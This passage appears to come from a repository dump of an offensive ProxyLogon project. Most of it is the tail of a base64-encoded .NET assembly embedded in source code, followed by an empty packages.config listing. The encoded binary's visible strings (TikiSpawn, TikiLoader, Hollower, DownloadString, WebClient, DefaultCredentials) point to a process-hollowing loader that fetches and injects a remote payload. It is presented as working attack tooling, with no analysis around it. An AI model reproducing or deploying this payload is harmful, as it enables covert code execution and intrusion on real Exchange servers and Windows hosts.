J1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEJ5dGUAVHJ5R2V0VmFsdWUAYWRkX0Fzc2VtYmx5UmVzb2x2ZQBUaWtpU3Bhd24uZXhlAFN5c3RlbS5UaHJlYWRpbmcARW5jb2RpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAERvd25sb2FkU3RyaW5nAEN1bHR1cmVUb1N0cmluZwBHZXRTdHJpbmcAQXR0YWNoAGdldF9MZW5ndGgARW5kc1dpdGgAbnVsbENhY2hlTG9jawB1cmwAUmVhZFN0cmVhbQBMb2FkU3RyZWFtAEdldE1hbmlmZXN0UmVzb3VyY2VTdHJlYW0ARGVmbGF0ZVN0cmVhbQBNZW1vcnlTdHJlYW0Ac3RyZWFtAFByb2dyYW0Ac2V0X0l0ZW0AU3lzdGVtAE1haW4AQXBwRG9tYWluAGdldF9DdXJyZW50RG9tYWluAEZvZHlWZXJzaW9uAFN5c3RlbS5JTy5Db21wcmVzc2lvbgBkZXN0aW5hdGlvbgBTeXN0ZW0uR2xvYmFsaXphdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBzZXRfUG9zaXRpb24AU3RyaW5nQ29tcGFyaXNvbgBUaWtpU3Bhd24AQ29weVRvAGdldF9DdWx0dXJlSW5mbwBDaGFyAFRpa2lMb2FkZXIAQXNzZW1ibHlMb2FkZXIAc2VuZGVyAFJlc29sdmVFdmVudEhhbmRsZXIARW50ZXIASG9sbG93ZXIALmN0b3IALmNjdG9yAE1vbml0b3IAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAFJlYWRGcm9tRW1iZWRkZWRSZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAR2V0QXNzZW1ibGllcwByZXNvdXJjZU5hbWVzAHN5bWJvbE5hbWVzAGFzc2VtYmx5TmFtZXMAZ2V0X0ZsYWdzAEFzc2VtYmx5TmFtZUZsYWdzAFJlc29sdmVFdmVudEFyZ3MAYXJncwBJQ3JlZGVudGlhbHMAc2V0X0NyZWRlbnRpYWxzAGdldF9EZWZhdWx0Q3JlZGVudGlhbHMARXF1YWxzAEdldEN1cnJlbnRQcm9jZXNzAHByb2Nlc3MAQ29uY2F0AE9iamVjdABTeXN0ZW0uTmV0AFNwbGl0AEV4aXQAVG9Mb3dlckludmFyaWFudABXZWJDbGllbnQAQ29udmVydABXZWJSZXF1ZXN0AFN5c3RlbS5UZXh0AFByb2Nlc3NlZEJ5Rm9keQBDb250YWluc0tleQBSZXNvbHZlQXNzZW1ibHkAUmVhZEV4aXN0aW5nQXNzZW1ibHkAR2V0RXhlY3V0aW5nQXNzZW1ibHkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0eQBJc051bGxPckVtcHR5AGdldF9Qcm94eQBzZXRfUHJveHkASVdlYlByb3h5AEdldFN5c3RlbVdlYlByb3h5AAAAAQAXLgBjAG8AbQBwAHIAZQBzAHMAZQBkAAADLgAAD2MAbwBzAHQAdQByAGEAAD1jAG8AcwB0AHUAcgBhAC4AYwBvAHMAdAB1AHIAYQAuAGQAbABsAC4AYwBvAG0AcAByAGUAcwBzAGUAZAAAFXQAaQBrAGkAbABvAGEAZABlAHIAAENjAG8AcwB0AHUAcgBhAC4AdABpAGsAaQBsAG8AYQBkAGUAcgAuAGQAbABsAC4AYwBvAG0AcAByAGUAcwBzAGUAZAAAQ2MAbwBzAHQAdQByAGEALgB0AGkAawBpAGwAbwBhAGQAZQByAC4AcABkAGIALgBjAG8AbQBwAHIAZQBzAHMAZQBkAAAAZwQsRcmxlkShIxeaNRP1mQAIt3pcVhk04IkDAAABAyAAAQQAABIRBSABARIRBCAAEhEEAAASGQUgAQESGQQgAQ4OBQABHQUOBgABHQUdBQoHBQgIHRIlCBIlBAAAEiUDIAAIBgABHRIlDg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"; 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /SharpProxyLogon/packages.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | --------------------------------------------------------------------------------